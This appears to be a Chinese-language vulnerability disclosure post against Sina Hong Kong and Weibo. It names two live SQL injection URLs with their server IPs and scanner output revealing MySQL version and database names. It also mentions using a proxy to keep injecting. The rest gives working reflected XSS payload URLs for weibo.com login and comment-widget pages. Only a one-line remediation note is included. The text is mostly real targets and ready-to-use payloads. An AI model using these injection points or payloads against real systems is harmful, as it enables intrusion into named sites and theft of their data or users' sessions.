不过注入需要一点小条件...
两个注入: 其中一个盲注，一个可以可以执行部分查询命令
 
注入站点1：
http://sme.sina.com.hk/cgi-bin/nw/main.cgi?cat=7806
ip：218.213.85.141

注入站点2:
http://house.sina.com.hk/cgi-bin/nw/main.cgi?id=7
ip:218.213.85.179

条件:
不知道是不是域名解析问题还是什么什么原因，有时候国内ip不能访问这些域名或者ip也不可以
不过如果代理出去就可以了继续注入了--！

域名1：
http://sme.sina.com.hk/cgi-bin/nw/main.cgi?cat=7806

Host IP: 218.213.85.141
Keyword Found: ?T?x????????C????
Injection type is Integer
DB Server: MySQL >=4.1
Selected Column Count is 1
Valid String Column is 1
Current DB: sme

域名2：mysql盲注

Host IP: 218.213.85.179
Keyword Found: iPhone
Injection type is Integer
DB Server: MySQL >=4.1
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Testing for MySQL error based injection method
MySQL error based injection method cant be used!
Trying blind method
Finding current data base
Length of 'Current DB' is 5
Current DB: house

站点1可以select @@version->4.1.22-log

站点2:mysql盲注

 



作者 upload


xss：

1.

地址:
http://weibo.com/login.php?url=http://club.weibo.com&entry=daren"><script>alert(/By+FeiFei/)</script>




修复方案：
这个...你们处理很多了。。。

编码或转义用户提交参数。

http://weibo.com/callmefeifei 求粉。

地址一:
http://open.weibo.com/widget/comments.php

问题出在手动配置url处,过滤的不够严谨。

地址二:
http://widget.weibo.com/distribution/comments.php?language=zh_cn&appkey=1&url=http://feifei']);'</script><ScRipt>alert(/By+FeiFei/)</ScRipt>

看了下,这样也OK~~